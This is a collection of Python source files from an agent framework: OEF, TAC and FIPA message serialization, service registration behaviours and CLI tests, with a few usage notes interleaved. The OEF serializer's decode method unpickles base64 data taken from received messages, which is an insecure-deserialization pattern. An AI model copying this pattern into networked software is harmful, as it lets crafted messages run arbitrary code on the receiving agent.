:param exchange_params_by_currency: exchange params by currency
:param balance_by_currency: balance by currency
:return: utility value
"""
money_utility = [exchange_params_by_currency[currency] * balance for currency, balance in balance_by_currency.items()]
return sum(money_utility)
```
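A worked example of the two helpers above with made-up parameters (two goods with equal weights, one currency); the import path follows the file path shown in the header and is an assumption.

```python
from aea.helpers.preference_representations.base import linear_utility, logarithmic_utility

goods_utility = logarithmic_utility(
    utility_params_by_good_pbk={"good_1": 0.5, "good_2": 0.5},
    quantities_by_good_pbk={"good_1": 2, "good_2": 0},
)  # 0.5 * ln(2 + 1) + 0.5 * ln(0 + 1) ≈ 0.549
money_utility = linear_utility(
    exchange_params_by_currency={"FET": 1.0},
    balance_by_currency={"FET": 10},
)  # 1.0 * 10 = 10.0
print(goods_utility + money_utility)  # ≈ 10.549
```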
#### File: protocols/oef/serialization.py
```python
import base64
import copy
import json
import pickle
from aea.protocols.base import Message
from aea.protocols.base import Serializer
from aea.protocols.oef.message import OEFMessage
from aea.protocols.oef.models import Description, Query
"""default 'to' field for OEF envelopes."""
DEFAULT_OEF = "oef"
class OEFSerializer(Serializer):
"""Serialization for the OEF protocol."""
def encode(self, msg: Message) -> bytes:
"""
        Encode the message.
:param msg: the message object
:return: the bytes
"""
oef_type = OEFMessage.Type(msg.get("type"))
new_body = copy.copy(msg.body)
new_body["type"] = oef_type.value
if oef_type in {OEFMessage.Type.REGISTER_SERVICE, OEFMessage.Type.UNREGISTER_SERVICE}:
service_description = msg.body["service_description"] # type: Description
service_description_bytes = base64.b64encode(pickle.dumps(service_description)).decode("utf-8")
new_body["service_description"] = service_description_bytes
elif oef_type in {OEFMessage.Type.REGISTER_AGENT, OEFMessage.Type.UNREGISTER_AGENT}:
agent_description = msg.body["agent_description"] # type: Description
agent_description_bytes = base64.b64encode(pickle.dumps(agent_description)).decode("utf-8")
new_body["agent_description"] = agent_description_bytes
elif oef_type in {OEFMessage.Type.SEARCH_SERVICES, OEFMessage.Type.SEARCH_AGENTS}:
query = msg.body["query"] # type: Query
query_bytes = base64.b64encode(pickle.dumps(query)).decode("utf-8")
new_body["query"] = query_bytes
elif oef_type in {OEFMessage.Type.SEARCH_RESULT}:
            # we need this cast because the "agents" field might contain
            # the Protobuf type "RepeatedScalarContainer", which is not JSON serializable.
new_body["agents"] = list(msg.body["agents"])
elif oef_type in {OEFMessage.Type.OEF_ERROR}:
operation = msg.body["operation"]
new_body["operation"] = str(operation)
oef_message_bytes = json.dumps(new_body).encode("utf-8")
return oef_message_bytes
def decode(self, obj: bytes) -> Message:
"""
Decode the message.
:param obj: the bytes object
:return: the message
"""
json_msg = json.loads(obj.decode("utf-8"))
oef_type = OEFMessage.Type(json_msg["type"])
new_body = copy.copy(json_msg)
new_body["type"] = oef_type
if oef_type in {OEFMessage.Type.REGISTER_SERVICE, OEFMessage.Type.UNREGISTER_SERVICE}:
service_description_bytes = base64.b64decode(json_msg["service_description"])
service_description = pickle.loads(service_description_bytes)
new_body["service_description"] = service_description
elif oef_type in {OEFMessage.Type.REGISTER_AGENT, OEFMessage.Type.UNREGISTER_AGENT}:
agent_description_bytes = base64.b64decode(json_msg["agent_description"])
agent_description = pickle.loads(agent_description_bytes)
new_body["agent_description"] = agent_description
elif oef_type in {OEFMessage.Type.SEARCH_SERVICES, OEFMessage.Type.SEARCH_AGENTS}:
query_bytes = base64.b64decode(json_msg["query"])
query = pickle.loads(query_bytes)
new_body["query"] = query
elif oef_type in {OEFMessage.Type.SEARCH_RESULT}:
new_body["agents"] = list(json_msg["agents"])
elif oef_type in {OEFMessage.Type.OEF_ERROR}:
operation = json_msg["operation"]
new_body["operation"] = OEFMessage.OEFErrorOperation(int(operation))
oef_message = OEFMessage(oef_type=oef_type, body=new_body)
return oef_message
```
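A tentative encode/decode round trip for the serializer above. It assumes `OEFMessage` accepts its fields as keyword arguments and stores them in `msg.body`, which is how `encode` reads them; if the message constructor differs, adapt the sketch accordingly.

```python
from aea.protocols.oef.message import OEFMessage
from aea.protocols.oef.serialization import OEFSerializer

serializer = OEFSerializer()
msg = OEFMessage(oef_type=OEFMessage.Type.SEARCH_RESULT, id=1, agents=["agent_pbk_1", "agent_pbk_2"])
encoded = serializer.encode(msg)   # JSON bytes, per the SEARCH_RESULT branch of encode()
decoded = serializer.decode(encoded)
assert decoded.get("agents") == ["agent_pbk_1", "agent_pbk_2"]
```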
#### File: protocols/tac/serialization.py
```python
import sys
from typing import Any, Dict, TYPE_CHECKING
from aea.protocols.base import Message
from aea.protocols.base import Serializer
if TYPE_CHECKING or "pytest" in sys.modules:
from packages.protocols.tac import tac_pb2
from packages.protocols.tac.message import TACMessage
else:
import tac_protocol.tac_pb2 as tac_pb2 # pragma: no cover
from tac_protocol.message import TACMessage # pragma: no cover
def _from_dict_to_pairs(d):
"""Convert a flat dictionary into a list of StrStrPair or StrIntPair."""
result = []
items = sorted(d.items(), key=lambda pair: pair[0])
for key, value in items:
if type(value) == int:
pair = tac_pb2.StrIntPair()
elif type(value) == str:
pair = tac_pb2.StrStrPair()
elif type(value) == float:
pair = tac_pb2.StrFloatPair()
else:
raise ValueError("Either 'int' or 'str' or 'float', not {}".format(type(value)))
pair.first = key
pair.second = value
result.append(pair)
return result
def _from_pairs_to_dict(pairs):
"""Convert a list of StrStrPair or StrIntPair or StrFloatPair into a flat dictionary."""
result = {}
for pair in pairs:
key = pair.first
value = pair.second
result[key] = value
return result
class TACSerializer(Serializer):
"""Serialization for the TAC protocol."""
def encode(self, msg: Message) -> bytes:
"""
        Encode the message.
:param msg: the message object
:return: the bytes
"""
tac_type = TACMessage.Type(msg.get("type"))
tac_container = tac_pb2.TACMessage()
if tac_type == TACMessage.Type.REGISTER:
agent_name = msg.get("agent_name")
tac_msg = tac_pb2.TACAgent.Register() # type: ignore
tac_msg.agent_name = agent_name
tac_container.register.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.UNREGISTER:
tac_msg = tac_pb2.TACAgent.Unregister() # type: ignore
tac_container.unregister.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION:
tac_msg = tac_pb2.TACAgent.Transaction() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.counterparty = msg.get("counterparty")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.sender_tx_fee = msg.get("sender_tx_fee")
tac_msg.counterparty_tx_fee = msg.get("counterparty_tx_fee")
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GET_STATE_UPDATE:
tac_msg = tac_pb2.TACAgent.GetStateUpdate() # type: ignore
tac_container.get_state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.CANCELLED:
tac_msg = tac_pb2.TACController.Cancelled() # type: ignore
tac_container.cancelled.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GAME_DATA:
tac_msg = tac_pb2.TACController.GameData() # type: ignore
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.exchange_params_by_currency.extend(_from_dict_to_pairs(msg.get("exchange_params_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_msg.utility_params_by_good_pbk.extend(_from_dict_to_pairs(msg.get("utility_params_by_good_pbk")))
tac_msg.tx_fee = msg.get("tx_fee")
tac_msg.agent_pbk_to_name.extend(_from_dict_to_pairs(msg.get("agent_pbk_to_name")))
tac_msg.good_pbk_to_name.extend(_from_dict_to_pairs(msg.get("good_pbk_to_name")))
tac_msg.version_id = msg.get("version_id")
tac_container.game_data.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION_CONFIRMATION:
tac_msg = tac_pb2.TACController.TransactionConfirmation() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction_confirmation.CopyFrom(tac_msg)
# elif tac_type == TACMessage.Type.STATE_UPDATE:
# tac_msg = tac_pb2.TACController.StateUpdate() # type: ignore
# game_data_json = msg.get("game_data")
# game_data = tac_pb2.TACController.GameData() # type: ignore
# game_data.amount_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["amount_by_currency"]))) # type: ignore
# game_data.exchange_params_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["exchange_params_by_currency"]))) # type: ignore
# game_data.quantities_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["quantities_by_good_pbk"]))) # type: ignore
# game_data.utility_params_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["utility_params_by_good_pbk"]))) # type: ignore
# game_data.tx_fee = game_data_json["tx_fee"] # type: ignore
# game_data.agent_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["agent_pbk_to_name"]))) # type: ignore
# game_data.good_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["good_pbk_to_name"]))) # type: ignore
# tac_msg.initial_state.CopyFrom(game_data)
# transactions = []
# msg_transactions = cast(List[Any], msg.get("transactions"))
# for t in msg_transactions:
# tx = tac_pb2.TACAgent.Transaction() # type: ignore
# tx.transaction_id = t.get("transaction_id")
# tx.counterparty = t.get("counterparty")
# tx.amount_by_currency.extend(_from_dict_to_pairs(t.get("amount_by_currency")))
# tx.sender_tx_fee = t.get("sender_tx_fee")
# tx.counterparty_tx_fee = t.get("counterparty_tx_fee")
# tx.quantities_by_good_pbk.extend(_from_dict_to_pairs(t.get("quantities_by_good_pbk")))
# transactions.append(tx)
# tac_msg.txs.extend(transactions)
# tac_container.state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TAC_ERROR:
tac_msg = tac_pb2.TACController.Error() # type: ignore
tac_msg.error_code = TACMessage.ErrorCode(msg.get("error_code")).value
if msg.is_set("error_msg"):
tac_msg.error_msg = msg.get("error_msg")
if msg.is_set("details"):
tac_msg.details.update(msg.get("details"))
tac_container.error.CopyFrom(tac_msg)
else:
raise ValueError("Type not recognized: {}.".format(tac_type))
tac_message_bytes = tac_container.SerializeToString()
return tac_message_bytes
def decode(self, obj: bytes) -> Message:
"""
Decode the message.
:param obj: the bytes object
:return: the message
"""
tac_container = tac_pb2.TACMessage()
tac_container.ParseFromString(obj)
new_body = {} # type: Dict[str, Any]
tac_type = tac_container.WhichOneof("content")
if tac_type == "register":
new_body["type"] = TACMessage.Type.REGISTER
new_body["agent_name"] = tac_container.register.agent_name
elif tac_type == "unregister":
new_body["type"] = TACMessage.Type.UNREGISTER
elif tac_type == "transaction":
new_body["type"] = TACMessage.Type.TRANSACTION
new_body["transaction_id"] = tac_container.transaction.transaction_id
new_body["counterparty"] = tac_container.transaction.counterparty
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction.amount_by_currency)
new_body["sender_tx_fee"] = tac_container.transaction.sender_tx_fee
new_body["counterparty_tx_fee"] = tac_container.transaction.counterparty_tx_fee
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction.quantities_by_good_pbk)
elif tac_type == "get_state_update":
new_body["type"] = TACMessage.Type.GET_STATE_UPDATE
elif tac_type == "cancelled":
new_body["type"] = TACMessage.Type.CANCELLED
elif tac_type == "game_data":
new_body["type"] = TACMessage.Type.GAME_DATA
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.game_data.amount_by_currency)
new_body["exchange_params_by_currency"] = _from_pairs_to_dict(tac_container.game_data.exchange_params_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.quantities_by_good_pbk)
new_body["utility_params_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.utility_params_by_good_pbk)
new_body["tx_fee"] = tac_container.game_data.tx_fee
new_body["agent_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.agent_pbk_to_name)
new_body["good_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.good_pbk_to_name)
new_body["version_id"] = tac_container.game_data.version_id
elif tac_type == "transaction_confirmation":
new_body["type"] = TACMessage.Type.TRANSACTION_CONFIRMATION
new_body["transaction_id"] = tac_container.transaction_confirmation.transaction_id
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction_confirmation.amount_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction_confirmation.quantities_by_good_pbk)
# elif tac_type == "state_update":
# new_body["type"] = TACMessage.Type.STATE_UPDATE
# game_data = dict(
# amount_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.amount_by_currency),
# exchange_params_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.exchange_params_by_currency),
# quantities_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.quantities_by_good_pbk),
# utility_params_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.utility_params_by_good_pbk),
# tx_fee=tac_container.state_update.game_data.tx_fee,
# agent_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.agent_pbk_to_name),
# good_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.good_pbk_to_name),
# version_id=tac_container.state_update.game_data.version_id
# )
# new_body["game_data"] = game_data
# transactions = []
# for transaction in tac_container.state_update.transactions:
# tx_json = dict(
# transaction_id=transaction.transaction_id,
# counterparty=transaction.counterparty,
# amount_by_currency=_from_pairs_to_dict(transaction.amount_by_currency),
# sender_tx_fee=transaction.sender_tx_fee,
# counterparty_tx_fee=transaction.counterparty_tx_fee,
# quantities_by_good_pbk=_from_pairs_to_dict(transaction.quantities_by_good_pbk),
# )
# transactions.append(tx_json)
# new_body["transactions"] = transactions
elif tac_type == "error":
new_body["type"] = TACMessage.Type.TAC_ERROR
new_body["error_code"] = TACMessage.ErrorCode(tac_container.error.error_code)
if tac_container.error.error_msg:
new_body["error_msg"] = tac_container.error.error_msg
if tac_container.error.details:
new_body["details"] = dict(tac_container.error.details)
else:
raise ValueError("Type not recognized.")
tac_type = TACMessage.Type(new_body["type"])
new_body["type"] = tac_type
tac_message = TACMessage(tac_type=tac_type, body=new_body)
return tac_message
```
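The encode and decode methods above round-trip dictionary fields through repeated protobuf pair entries via `_from_dict_to_pairs` and `_from_pairs_to_dict`, which are defined elsewhere in the module and not shown in this excerpt. The snippet below is only an illustrative sketch of what such helpers plausibly look like; the `Pair` namedtuple is a stand-in for the generated protobuf pair type, not the real class.

```python
from collections import namedtuple
from typing import Any, Dict, Iterable, List

# Stand-in for the generated protobuf pair message used by the real helpers.
Pair = namedtuple("Pair", ["first", "second"])


def _from_dict_to_pairs(data: Dict[str, Any]) -> List[Pair]:
    """Flatten a plain dict into a list of (first, second) pair entries."""
    return [Pair(first=key, second=value) for key, value in data.items()]


def _from_pairs_to_dict(pairs: Iterable[Pair]) -> Dict[str, Any]:
    """Rebuild a plain dict from an iterable of pair entries."""
    return {pair.first: pair.second for pair in pairs}


if __name__ == "__main__":
    original = {"FET": 10, "BTC": 2}
    assert _from_pairs_to_dict(_from_dict_to_pairs(original)) == original
```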
#### File: skills/tac_negotiation/registration.py
```python
import datetime
from typing import Optional
from aea.protocols.oef.models import Description
from aea.skills.base import SharedClass
class Registration(SharedClass):
"""This class deals with the services registration state."""
def __init__(self, **kwargs):
"""Instantiate the search class."""
self._update_interval = kwargs.pop('update_interval', 5) # type: int
super().__init__(**kwargs)
self._id = 0
self.registered_goods_demanded_description = None # type: Optional[Description]
self.registered_goods_supplied_description = None # type: Optional[Description]
self._last_update_time = datetime.datetime.now() # type: datetime.datetime
@property
def id(self) -> int:
"""Get the search id."""
return self._id
def get_next_id(self) -> int:
"""
        Generate the next search id and store it.
:return: a search id
"""
self._id += 1
return self.id
def is_time_to_update_services(self) -> bool:
"""
Check if the agent should update the service directory.
:return: bool indicating the action
"""
now = datetime.datetime.now()
diff = now - self._last_update_time
result = diff.total_seconds() > self._update_interval
if result:
self._last_update_time = now
return result
```
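`Registration.is_time_to_update_services` implements a simple elapsed-time throttle: it returns True at most once per `update_interval` seconds and resets its clock only when it tells the caller to act. Below is a minimal standalone sketch of that pattern, outside the AEA skill machinery; the class and names are illustrative only.

```python
import datetime


class UpdateThrottle:
    """Illustrative stand-in: answer True at most once per `interval` seconds."""

    def __init__(self, interval: float) -> None:
        self._interval = interval
        self._last_update_time = datetime.datetime.now()

    def is_due(self) -> bool:
        now = datetime.datetime.now()
        if (now - self._last_update_time).total_seconds() > self._interval:
            self._last_update_time = now   # reset only when the caller is told to act
            return True
        return False


throttle = UpdateThrottle(interval=5)
print(throttle.is_due())   # False right after construction; True once 5+ seconds pass
```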
#### File: skills/weather_station/behaviours.py
```python
import datetime
import logging
import sys
from typing import cast, Optional, TYPE_CHECKING
from aea.skills.base import Behaviour
from aea.protocols.oef.message import OEFMessage
from aea.protocols.oef.models import Description
from aea.protocols.oef.serialization import OEFSerializer, DEFAULT_OEF
if TYPE_CHECKING or "pytest" in sys.modules:
from packages.skills.weather_station.strategy import Strategy
else:
from weather_station_skill.strategy import Strategy
logger = logging.getLogger("aea.weather_station_skill")
SERVICE_ID = ''
class ServiceRegistrationBehaviour(Behaviour):
"""This class implements a behaviour."""
def __init__(self, **kwargs):
"""Initialise the behaviour."""
self._services_interval = kwargs.pop('services_interval', 30) # type: int
super().__init__(**kwargs)
self._last_update_time = datetime.datetime.now() # type: datetime.datetime
self._registered_service_description = None # type: Optional[Description]
def setup(self) -> None:
"""
Implement the setup.
:return: None
"""
self._register_service()
def act(self) -> None:
"""
Implement the act.
:return: None
"""
if self._is_time_to_update_services():
self._unregister_service()
self._register_service()
def teardown(self) -> None:
"""
Implement the task teardown.
:return: None
"""
self._unregister_service()
def _register_service(self) -> None:
"""
Register to the OEF Service Directory.
:return: None
"""
strategy = cast(Strategy, self.context.strategy)
desc = strategy.get_service_description()
self._registered_service_description = desc
oef_msg_id = strategy.get_next_oef_msg_id()
msg = OEFMessage(oef_type=OEFMessage.Type.REGISTER_SERVICE,
id=oef_msg_id,
service_description=desc,
service_id=SERVICE_ID)
self.context.outbox.put_message(to=DEFAULT_OEF,
sender=self.context.agent_public_key,
protocol_id=OEFMessage.protocol_id,
message=OEFSerializer().encode(msg))
logger.info("[{}]: updating weather station services on OEF.".format(self.context.agent_name))
def _unregister_service(self) -> None:
"""
Unregister service from OEF Service Directory.
:return: None
"""
strategy = cast(Strategy, self.context.strategy)
oef_msg_id = strategy.get_next_oef_msg_id()
msg = OEFMessage(oef_type=OEFMessage.Type.UNREGISTER_SERVICE,
id=oef_msg_id,
service_description=self._registered_service_description,
service_id=SERVICE_ID)
self.context.outbox.put_message(to=DEFAULT_OEF,
sender=self.context.agent_public_key,
protocol_id=OEFMessage.protocol_id,
message=OEFSerializer().encode(msg))
logger.info("[{}]: unregistering weather station services from OEF.".format(self.context.agent_name))
self._registered_service_description = None
def _is_time_to_update_services(self) -> bool:
"""
Check if the agent should update the service directory.
:return: bool indicating the action
"""
now = datetime.datetime.now()
diff = now - self._last_update_time
result = diff.total_seconds() > self._services_interval
if result:
self._last_update_time = now
return result
```
#### File: protocols/fipa/message.py
```python
from enum import Enum
from typing import Dict, List, Optional, Tuple, Union, cast
from aea.protocols.base import Message
from aea.protocols.oef.models import Description, Query
class FIPAMessage(Message):
"""The FIPA message class."""
protocol_id = "fipa"
STARTING_MESSAGE_ID = 1
STARTING_TARGET = 0
class Performative(Enum):
"""FIPA performatives."""
CFP = "cfp"
PROPOSE = "propose"
ACCEPT = "accept"
MATCH_ACCEPT = "match_accept"
DECLINE = "decline"
INFORM = "inform"
ACCEPT_W_ADDRESS = "accept_w_address"
MATCH_ACCEPT_W_ADDRESS = "match_accept_w_address"
def __str__(self):
"""Get string representation."""
return self.value
    def __init__(self, dialogue_reference: Optional[Tuple[str, str]] = None,
message_id: Optional[int] = None,
target: Optional[int] = None,
performative: Optional[Union[str, Performative]] = None,
**kwargs):
"""
Initialize.
:param message_id: the message id.
:param dialogue_reference: the dialogue reference.
:param target: the message target.
:param performative: the message performative.
"""
super().__init__(message_id=message_id,
dialogue_reference=dialogue_reference,
target=target,
performative=FIPAMessage.Performative(performative),
**kwargs)
assert self.check_consistency(), "FIPAMessage initialization inconsistent."
def check_consistency(self) -> bool:
"""Check that the data is consistent."""
try:
assert self.is_set("dialogue_reference")
dialogue_reference = self.get("dialogue_reference")
assert type(dialogue_reference) == tuple
dialogue_reference = cast(Tuple, dialogue_reference)
            assert type(dialogue_reference[0]) == str and type(dialogue_reference[1]) == str
assert self.is_set("message_id")
assert type(self.get("message_id")) == int
assert self.is_set("target")
assert type(self.get("target")) == int
performative = FIPAMessage.Performative(self.get("performative"))
if performative == FIPAMessage.Performative.CFP:
assert self.is_set("query")
query = self.get("query")
assert isinstance(query, Query) or isinstance(query, bytes) or query is None
assert len(self.body) == 5
elif performative == FIPAMessage.Performative.PROPOSE:
assert self.is_set("proposal")
proposal = self.get("proposal")
assert type(proposal) == list and all(isinstance(d, Description) or type(d) == bytes for d in proposal) # type: ignore
assert len(self.body) == 5
elif performative == FIPAMessage.Performative.ACCEPT \
or performative == FIPAMessage.Performative.MATCH_ACCEPT \
or performative == FIPAMessage.Performative.DECLINE:
assert len(self.body) == 4
elif performative == FIPAMessage.Performative.ACCEPT_W_ADDRESS\
or performative == FIPAMessage.Performative.MATCH_ACCEPT_W_ADDRESS:
assert self.is_set("address")
assert len(self.body) == 5
elif performative == FIPAMessage.Performative.INFORM:
assert self.is_set("json_data")
json_data = self.get("json_data")
assert isinstance(json_data, dict)
assert len(self.body) == 5
else:
raise ValueError("Performative not recognized.")
except (AssertionError, ValueError, KeyError):
return False
return True
VALID_PREVIOUS_PERFORMATIVES = {
FIPAMessage.Performative.CFP: [None],
FIPAMessage.Performative.PROPOSE: [FIPAMessage.Performative.CFP],
FIPAMessage.Performative.ACCEPT: [FIPAMessage.Performative.PROPOSE],
FIPAMessage.Performative.ACCEPT_W_ADDRESS: [FIPAMessage.Performative.PROPOSE],
FIPAMessage.Performative.MATCH_ACCEPT: [FIPAMessage.Performative.ACCEPT, FIPAMessage.Performative.ACCEPT_W_ADDRESS],
FIPAMessage.Performative.MATCH_ACCEPT_W_ADDRESS: [FIPAMessage.Performative.ACCEPT, FIPAMessage.Performative.ACCEPT_W_ADDRESS],
FIPAMessage.Performative.INFORM: [FIPAMessage.Performative.MATCH_ACCEPT, FIPAMessage.Performative.MATCH_ACCEPT_W_ADDRESS, FIPAMessage.Performative.INFORM],
FIPAMessage.Performative.DECLINE: [FIPAMessage.Performative.CFP, FIPAMessage.Performative.PROPOSE, FIPAMessage.Performative.ACCEPT, FIPAMessage.Performative.ACCEPT_W_ADDRESS]
} # type: Dict[FIPAMessage.Performative, List[Union[None, FIPAMessage.Performative]]]
```
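`VALID_PREVIOUS_PERFORMATIVES` encodes which performative may follow which in a FIPA dialogue (e.g. a PROPOSE must answer a CFP). The sketch below mirrors that lookup with plain strings so it runs on its own; `is_valid_reply` is a hypothetical helper for illustration, not part of the protocol code.

```python
from typing import Dict, List, Optional

# Plain strings stand in for FIPAMessage.Performative; the table mirrors the shape of
# VALID_PREVIOUS_PERFORMATIVES but is deliberately abbreviated.
VALID_PREVIOUS: Dict[str, List[Optional[str]]] = {
    "cfp": [None],
    "propose": ["cfp"],
    "accept": ["propose"],
    "decline": ["cfp", "propose", "accept"],
}


def is_valid_reply(previous: Optional[str], current: str) -> bool:
    """Check whether `current` is allowed to follow `previous` in a dialogue."""
    return previous in VALID_PREVIOUS.get(current, [])


assert is_valid_reply(None, "cfp")           # a dialogue starts with a CFP
assert is_valid_reply("cfp", "propose")      # a PROPOSE answers a CFP
assert not is_valid_reply("accept", "cfp")   # a CFP cannot follow an ACCEPT
```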
#### File: tests/test_cli/test_create.py
```python
import filecmp
import json
import os
import shutil
import tempfile
import unittest
from pathlib import Path
from typing import Dict
from unittest.mock import patch
import jsonschema
import pytest
import yaml
from ..common.click_testing import CliRunner
from jsonschema import Draft4Validator
import aea
import aea.cli.common
from aea.cli import cli
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE
from aea.configurations.loader import ConfigLoader
from tests.conftest import AGENT_CONFIGURATION_SCHEMA, ROOT_DIR, CONFIGURATION_SCHEMA_DIR, CLI_LOG_OPTION
class TestCreate:
"""Test that the command 'aea create <agent_name>' works as expected."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.schema = json.load(open(AGENT_CONFIGURATION_SCHEMA))
cls.resolver = jsonschema.RefResolver("file://{}/".format(Path(CONFIGURATION_SCHEMA_DIR).absolute()), cls.schema)
cls.validator = Draft4Validator(cls.schema, resolver=cls.resolver)
cls.runner = CliRunner()
cls.agent_name = "myagent"
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def _load_config_file(self) -> Dict:
"""Load a config file."""
agent_config_file = Path(self.agent_name, DEFAULT_AEA_CONFIG_FILE) # type: ignore
file_pointer = open(agent_config_file, mode="r", encoding="utf-8")
agent_config_instance = yaml.safe_load(file_pointer)
return agent_config_instance
def test_exit_code_equal_to_zero(self):
"""Assert that the exit code is equal to zero (i.e. success)."""
assert self.result.exit_code == 0
def test_agent_directory_path_exists(self):
"""Check that the agent's directory has been created."""
agent_dir = Path(self.agent_name)
assert agent_dir.exists()
assert agent_dir.is_dir()
def test_configuration_file_has_been_created(self):
"""Check that an agent's configuration file has been created."""
agent_config_file = Path(self.agent_name, DEFAULT_AEA_CONFIG_FILE)
assert agent_config_file.exists()
assert agent_config_file.is_file()
def test_configuration_file_is_compliant_to_schema(self):
"""Check that the agent's configuration file is compliant with the schema."""
agent_config_instance = self._load_config_file()
try:
self.validator.validate(instance=agent_config_instance)
except jsonschema.exceptions.ValidationError as e:
pytest.fail("Configuration file is not compliant with the schema. Exception: {}".format(str(e)))
def test_aea_version_is_correct(self):
"""Check that the aea version in the configuration file is correct, i.e. the same of the installed package."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["aea_version"] == aea.__version__
def test_agent_name_is_correct(self):
"""Check that the agent name in the configuration file is correct."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["agent_name"] == self.agent_name
def test_authors_field_is_empty_string(self):
"""Check that the 'authors' field in the config file is the empty string."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["authors"] == ""
def test_connections_contains_only_oef(self):
"""Check that the 'connections' list contains only the 'oef' connection."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["connections"] == ["oef"]
def test_default_connection_field_is_oef(self):
"""Check that the 'default_connection' is the 'oef' connection."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["default_connection"] == "oef"
def test_license_field_is_empty_string(self):
"""Check that the 'license' is the empty string."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["license"] == ""
# def test_private_key_pem_path_field_is_empty_string(self):
# """Check that the 'private_key_pem_path' is the empty string."""
# agent_config_instance = self._load_config_file()
# assert agent_config_instance["private_key_pem_path"] == ""
def test_protocols_field_is_not_empty_list(self):
"""Check that the 'protocols' field is a list with the 'default' protocol."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["protocols"] == ["default"]
    def test_skills_field_contains_error_skill(self):
"""Check that the 'skills' field is a list with the 'error' skill."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["skills"] == ["error"]
def test_url_field_is_empty_string(self):
"""Check that the 'url' field is the empty string."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["url"] == ""
def test_version_field_is_equal_to_v1(self):
"""Check that the 'version' field is equal to the string 'v1'."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["version"] == "v1"
def test_connections_directory_exists(self):
"""Check that the connections directory exists."""
connections_dirpath = Path(self.agent_name, "connections")
assert connections_dirpath.exists()
assert connections_dirpath.is_dir()
def test_connections_contains_oef_connection(self):
"""Check that the connections directory contains the oef directory."""
oef_connection_dirpath = Path(self.agent_name, "connections", "oef")
assert oef_connection_dirpath.exists()
assert oef_connection_dirpath.is_dir()
def test_oef_connection_directory_is_equal_to_library_oef_connection(self):
"""Check that the oef connection directory is equal to the package's one (aea.connections.oef)."""
oef_connection_dirpath = Path(self.agent_name, "connections", "oef")
comparison = filecmp.dircmp(str(oef_connection_dirpath), str(Path(ROOT_DIR, "aea", "connections", "oef")))
assert comparison.diff_files == []
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
class TestCreateFailsWhenDirectoryAlreadyExists:
"""Test that 'aea create' sub-command fails when the directory with the agent name in input already exists."""
@classmethod
def setup_class(cls):
"""Set up the test class."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
cls.patch = unittest.mock.patch.object(aea.cli.common.logger, 'error')
cls.mocked_logger_error = cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
        # create a directory with the agent name -> make 'aea create' fail.
os.mkdir(cls.agent_name)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Test that the error code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
def test_log_error_message(self):
"""Test that the log error message is fixed.
The expected message is: 'Directory already exist. Aborting...'
"""
s = "Directory already exist. Aborting..."
self.mocked_logger_error.assert_called_once_with(s)
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
cls.patch.__exit__()
